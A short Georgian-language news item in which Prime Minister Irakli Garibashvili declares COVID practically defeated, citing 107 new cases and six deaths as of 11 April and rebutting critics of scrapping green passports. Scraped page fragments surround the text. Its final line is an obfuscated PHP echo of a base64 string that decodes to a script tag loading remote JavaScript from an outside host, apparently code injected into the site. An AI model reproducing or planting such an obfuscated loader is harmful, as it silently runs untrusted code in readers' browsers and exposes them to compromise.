celsiusi
ავერსი შნაიდერი
პრემიერ–მინისტრმა ირაკლი ღარიბაშვილმა მთავრობის სხდომაზე განაცხადა, რომ მინისტრის, მთავრობის და საბჭოს მიერ და ქვეყანაში კოვიდსიტუაცია დასტაბილურდა. 
 
"მინდა, ჩვენს მოქალაქეებს ვახარო, რომ შეიძლება ითქვას, კოვიდი პრაქტიკულად, თითქმის დამარცხებულია. დღეს ასეა ყოველ შემთხვევაში, ასეთი სიტუაცია გვაქვს. დღეს ვირუსის 107 ახალი შემთხვევა იყო. მინდა, გავახსენო სკეპტიკოსებს, რომლებიც ორი თვის წინ ჩემს გამონათქვამებს აკრიტიკებდნენ. მე მაშინ ვთქვი, რომ მას შემდეგ, რაც ომიკრონმა ჩაანაცვლა სხვა შტამები, ჩვენ გავაუქმეთ მწვანე პასპორტები, რადგან აზრს კარგავდა მწვანე ბარათი. მაშინ ზოგიერთი გენიოსი ექსპერტისგან მივიღეთ კრიტიკა, ეს როგორ გააკეთეს და ასე შემდეგ. ვნახეთ, სულ რაღაც ორ თვეში პროცესი იმართა, სწორად იმართა. სწორად იმართა მინისტრის, მთავრობის, საბჭოს მიერ და ყველაფერი არის სტაბილურად, დასტაბილურდა სიტუაცია."– განაცხადა პრემიერმა.
 
ცნობისთვის, 11 აპრილის მონაცემებით, COVID-19-ით 6 პაციენტი გარდაიცვალა. ბოლო 24 საათში დადასტურდა 107 ახალი შემთხვევა და გამოჯანმრთელდა 281 ადამიანი. 
736
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");